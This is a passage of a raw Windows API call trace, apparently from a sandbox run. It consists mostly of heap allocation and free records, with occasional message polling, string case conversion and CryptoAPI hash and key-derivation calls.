0x34a2070 [0266.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0266.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0266.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0266.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0266.246] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0266.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0266.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2070 [0266.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0266.246] CryptHashData (hHash=0xaa5660, pbData=0x34a2080, dwDataLen=0x3, dwFlags=0x1) returned 1 [0266.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0266.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0266.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2130 [0266.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0266.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0266.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0266.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0266.247] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0266.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0266.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0266.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0266.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0266.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0266.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0266.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0266.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0266.247] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.247] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0266.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0266.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0266.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0266.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0266.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0266.250] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0266.250] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0266.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0266.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0266.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0266.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0266.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0266.252] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0266.252] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.252] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0266.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0266.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0266.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0266.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0266.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0266.253] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0266.253] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0266.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0266.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0266.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0266.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0266.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0266.253] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0266.253] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.253] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0266.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0266.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0266.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0266.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0266.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0266.253] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0266.254] CryptDeriveKey (in: hProv=0xad2be8, Algid=0x6601, hBaseData=0xaa5660, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5860) returned 1 [0266.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0266.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0266.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0266.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0266.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0266.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0266.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0266.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0266.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0266.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0266.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0266.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0266.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0266.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0266.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0266.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0266.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0266.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0266.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0266.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0266.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0266.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0266.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0266.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0266.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0266.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0266.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0266.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0266.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0266.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0266.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0266.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0266.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0266.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0266.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0266.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0266.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0266.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0266.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0266.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0266.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0266.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0266.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0266.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0266.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0266.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0266.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0266.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0266.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0266.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0266.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0266.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0266.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0266.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0266.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0266.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0266.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0266.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0266.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0266.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0266.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0266.257] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0266.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0266.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0266.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0266.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0266.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0266.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0266.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0266.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0266.258] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0266.258] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0266.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0266.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0266.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0266.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0266.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0266.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0266.258] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0266.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0266.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0266.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0266.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0266.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0266.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0266.259] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0266.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0266.259] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0266.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0266.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0266.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0266.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0266.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0266.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0266.260] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0266.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0266.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.260] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0266.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0266.260] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0266.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0266.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0266.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0266.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0266.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0266.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.260] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0266.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0266.260] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0266.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0266.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0266.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0266.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0266.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0266.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0266.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0266.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0266.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0266.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0266.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0266.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0266.261] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0266.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0266.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0266.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0266.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0266.262] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0266.262] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466e30, cbMultiByte=17, lpDefaultChar=0x0, 